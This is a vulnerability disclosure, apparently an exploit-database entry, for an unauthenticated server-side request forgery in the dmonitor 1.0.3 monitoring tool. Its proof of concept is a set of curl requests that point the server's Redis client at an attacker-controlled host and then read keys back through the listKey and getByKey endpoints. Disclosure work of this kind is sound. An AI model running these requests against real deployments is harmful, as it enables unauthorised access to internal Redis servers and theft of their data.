📄 dmonitor 1.0.3 Server-Side Request Forgery

🗓️ 20 Apr 2026 00:00:00Reported by Chokri HammediType

Unauthenticated server side access enables Redis connections and data exfiltration in dmonitor 1.0.3.

# Exploit Title: dmonitor v1.0.3 - Unauthenticated SSRF
    # Date: 2026-04-18
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://github.com/dhjz/dmonitor
    # Software Link:
    https://github.com/dhjz/dmonitor/releases/download/1.0.3/dmonitor.exe
    # Version: 1.0.3
    # Tested on: Windows 10, Linux
    
    
    # Description:
    dmonitor v1.0.3 is a server monitoring tool with a Redis client feature.
    The /monitor-api/redis/initRedis endpoint allows unauthenticated users to
    specify arbitrary Redis connection parameters (host, port, password). This
    enables an attacker to force the dmonitor server to connect to an external
    attacker-controlled Redis server / internal Redis server and exfiltrate
    data through the listKey
    and getByKey endpoints.
    
    # Proof of Concept:
    
    1. Attacker sets up a Redis server on their machine (192.168.1.104):
       redis-server --port 6379
       redis-cli set test_key "SSRF_CONFIRMED"
    
    2. Force dmonitor to connect to attacker's Redis:
       curl "
    http://192.168.1.102:40001/monitor-api/redis/initRedis?host=192.168.1.104&port=6379&password=
    "
    
       Response: {"code":200,"msg":"操作成功","data":{"currDb":0,"redisInfo":{...}}}
    
    3. Enumerate keys from attacker's Redis via dmonitor:
       curl -s "http://192.168.1.102:40001/monitor-api/redis/listKey?keyword="
    
       Response: {"code":200,"msg":"操作成功","data":["test_key"]}
    
    4. Exfiltrate the value:
       curl -s "
    http://192.168.1.102:40001/monitor-api/redis/getByKey?key=test_key"
    
       Response:
    {"code":200,"msg":"操作成功","data":{"key":"test_key","value":"SSRF_CONFIRMED"}}

20 Apr 2026 00:00Current

5.8Medium risk

Vulners AI Score5.8